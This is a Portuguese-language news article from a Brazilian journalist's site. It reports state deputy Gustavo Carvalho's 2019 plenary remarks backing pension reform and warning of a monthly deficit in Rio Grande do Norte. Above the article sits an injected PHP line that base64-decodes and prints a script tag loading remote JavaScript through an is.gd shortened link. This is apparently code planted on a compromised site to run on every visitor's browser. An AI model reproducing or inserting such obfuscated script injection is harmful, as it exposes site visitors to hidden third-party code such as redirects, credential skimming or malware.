$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deputado Gustavo Carvalho diz que momento difícil no país exige senso de responsabilidade

Deputado Gustavo Carvalho diz que momento difícil no país exige senso de responsabilidade
06 Set 2019

Durante o seu pronunciamento na sessão plenária desta quarta-feira (4), o deputado Gustavo Carvalho (PSDB) disse que o momento de grandes dificuldades atravessadas pelo Rio Grande do Norte e o país exige um senso de responsabilidade dos gestores e legisladores. O parlamentar frisou que a população também precisa estar consciente.

“Fico indignado de ver no cenário político, deputados do Rio Grande do Norte se posicionarem contra a Reforma da Previdência. Mas esse voto é contra o nosso Estado. As pessoas que elegeram esses que são contrários à reforma tem que saber disso”, afirmou o parlamentar.

Gustavo Carvalho afirmou que se não houver reforma, o Estado sofrerá com um “rombo” nas finanças, em torno de R$ 130 milhões mensais. “Um rombo que não vai se pagar, porque não há como”, alertou o deputado. O deputado disse que o governo estadual precisa tomar urgentemente as decisões necessárias para equilíbrio das finanças.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *